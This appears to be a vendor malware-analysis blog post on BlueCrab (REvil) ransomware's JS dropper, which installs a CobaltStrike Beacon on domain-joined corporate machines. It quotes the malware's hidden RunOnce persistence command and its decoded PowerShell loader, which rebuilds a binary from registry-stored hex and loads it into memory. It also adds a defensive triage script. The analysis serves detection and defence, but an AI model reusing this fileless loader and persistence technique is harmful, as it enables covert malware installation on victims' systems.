BlueCrab Ransomware Installing Hacking Tool CobaltStrike in Corporate Environments

The ASEC analysis team has confirmed that the BlueCrab ransomware (also known as Sodinokibi or REvil), which is distributed as a JS file, delivers the CobaltStrike hacking tool instead of the ransomware under certain conditions. CobaltStrike is a commercial tool licensed for legitimate penetration testing, but it has been actively abused by malware since its recent source code leak. Because the recently confirmed BlueCrab distribution JS file checks for a corporate Active Directory (AD) environment and installs CobaltStrike rather than ransomware when the target is a corporate user, users must stay vigilant.

BlueCrab is a ransomware distributed via JS files downloaded from fake forum pages. Several articles about this ransomware and this distribution method have been posted previously.

When the JS file contacts the C2 server, it first checks whether the %USERDNSDOMAIN% environment variable exists on the user's system.

Checking for %USERDNSDOMAIN% environment variable

If the %USERDNSDOMAIN% environment variable exists, the value ("278146") is added to the request argument before the request is sent. The C2 response has been confirmed to differ depending on whether this value is present. In the past, the BlueCrab ransomware was downloaded even under this condition, but now CobaltStrike is downloaded instead. This environment variable does not exist in an ordinary user environment; it exists in domain-joined environments (such as a corporate AD network), so those systems end up infected with CobaltStrike.

The infection flow is similar to the previous BlueCrab distribution, JS → PowerShell → .NET Injector → Delphi Loader, but the details of each stage differ. For more information about the previous BlueCrab distribution, please refer to the blog links above.

In the payload that distributes CobaltStrike, the .NET Injector stage is split into two parts. For easier explanation, the first .NET PE will be referred to as the "Loader" and the second .NET PE as the "Injector." The .NET Loader binary is written to the "\HKEY_CURRENT_USER\Software\[Username]+'1'" key, and the .NET Injector binary is written to the "\HKEY_CURRENT_USER\Software\[Username]" key.

The PowerShell command that runs later reads the [Username] key to run the Loader, and when the Loader runs, it reads the [Username]+'1' key to run the Injector.

Loader Binary
Injector Binary

When the Loader runs, the following PowerShell command is registered in the autorun registry key.

  • Path: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
  • Data: powershell -Win Hi -Command "$r = [Environment]::GetEnvironmentVariable('K', 'User').split();$p=$r[0];$r[0]='';Start-Process $p -ArgumentList ($r -join ' ') -Win Hi"

The following command is stored in a user environment variable, which the RunOnce entry above reads and executes.

  • Path: Computer\HKEY_CURRENT_USER\Environment\K
  • Original Data: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -En "[Base64-encoded command omitted]"
  • Decoded Data:
    <# ebhzooi #>$u=$env:UserName;
    for ($i=0;$i -le 700;$i++){$c="HKCU:\SOFTWARE\"+$u+"1";Try{$a=$a+(Get-ItemProperty -path $c).$i}Catch{}};
    function chba{[cmdletbinding()]param([parameter(Mandatory=$true)][String]$hs);$Bytes = [byte[]]::new($hs.Length / 2);for($i=0; $i -lt $hs.Length; $i+=2){$Bytes[$i/2] = [convert]::ToByte($hs.Substring($i, 2), 16)}$Bytes};
    $i = 0;While ($True){$i++;$ko = [math]::Sqrt($i);if ($ko -eq 1000){ break}}
    [byte[]]$b = chba($a.replace("#",$ko));
    [Reflection.Assembly]::Load($b);
    [Mode]::Setup();

Because of these registry entries, a PowerShell command performing the same behavior runs again even after the PC reboots. Afterward, the Loader reads the Injector binary from the [Username] key, loads it into memory, and runs it. The Injector then launches the "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" process and injects the Delphi Loader binary into it.
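As an added triage example (not code from the ASEC post), the following PowerShell script checks a user hive for the three persistence artifacts described above and, if the chunked payload keys exist, reconstructs the stored binaries to disk for offline analysis instead of loading them. The output directory, the 20-value threshold, and the assumption that the [Username] key uses the same hex chunking as the [Username]+'1' key shown in the decoded script are mine.

```powershell
# Added example (not ASEC's code): hunt a user hive for the persistence artifacts
# described in the article and dump the chunked payload for analysis (never execute it).
# Registry paths and the '#' -> 1000 substitution come from the article; the
# value-count threshold, output directory and [Username]-key format are assumptions.
$OutDir = Join-Path $env:TEMP 'bluecrab-triage'
$findings = @()

# 1. RunOnce values that assemble their command line from an environment variable
$runOnce = Get-Item 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce' -ErrorAction SilentlyContinue
if ($runOnce) {
    foreach ($name in $runOnce.GetValueNames()) {
        $val = [string]$runOnce.GetValue($name)
        if ($val -match 'GetEnvironmentVariable' -and $val -match 'Start-Process') {
            $findings += "RunOnce '$name' builds its command from an env var: $val"
        }
    }
}

# 2. User environment variables carrying an encoded PowerShell command (-e/-en/-enc/-EncodedCommand)
$envKey = Get-Item 'HKCU:\Environment'
foreach ($name in $envKey.GetValueNames()) {
    $val = [string]$envKey.GetValue($name)
    if ($val -match '(?i)powershell(\.exe)?\s' -and $val -match '(?i)\s-e(n|nc|c|ncodedcommand)?\s') {
        $findings += "Environment variable '$name' holds an encoded PowerShell command"
    }
}

# 3. HKCU\SOFTWARE\<user> and <user>1: payload split across numeric-named hex string values
foreach ($suffix in '', '1') {
    $key = Get-Item "HKCU:\SOFTWARE\$env:UserName$suffix" -ErrorAction SilentlyContinue
    if (-not $key) { continue }
    $chunks = @($key.GetValueNames() | Where-Object { $_ -match '^\d+$' } | Sort-Object { [int]$_ })
    if ($chunks.Count -lt 20) { continue }     # assumed threshold; the sample used values 0..700
    $hex = (-join ($chunks | ForEach-Object { [string]$key.GetValue($_) })).Replace('#', '1000')
    if ($hex -notmatch '^[0-9A-Fa-f]+$' -or ($hex.Length % 2) -ne 0) {
        $findings += "$($key.Name): $($chunks.Count) numeric values, but not clean hex"; continue
    }
    $bytes = [byte[]]::new($hex.Length / 2)
    for ($i = 0; $i -lt $hex.Length; $i += 2) { $bytes[$i / 2] = [Convert]::ToByte($hex.Substring($i, 2), 16) }
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null
    $out = Join-Path $OutDir "payload_$($env:UserName)$suffix.bin"
    [IO.File]::WriteAllBytes($out, $bytes)
    $isPE = ($bytes.Length -gt 1) -and ($bytes[0] -eq 0x4D) -and ($bytes[1] -eq 0x5A)
    $findings += "$($key.Name): reconstructed $($bytes.Length) bytes -> $out (MZ header: $isPE)"
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } } else { 'No matching artifacts found.' }
```

Run it in the context of the user account under investigation, since all three artifacts live in that user's HKCU hive.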

.NET Loader Code (1)
.NET Loader Code (2)

The Delphi Loader started by the process above runs the embedded CobaltStrike Beacon binary. The CobaltStrike Beacon settings used in this case are as follows:

CobaltStrike Beacon Settings

The attacker distributes ransomware to ordinary individual users and CobaltStrike, for follow-on attacks, to users in corporate environments such as AD domains. Domain-joined corporate environments such as AD networks must take extra caution. Users must refrain from running suspicious-looking files and are advised to download files only from official source websites.

AhnLab's anti-malware product V3 detects these fileless attacks without a file-specific signature using the behavior detections below.

[Behavior Detection]

  • Malware/MDP.Inject.M3044
  • Malware/MDP.Behavior.M3491

[IOC Info]

trackback

[…] Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike […]
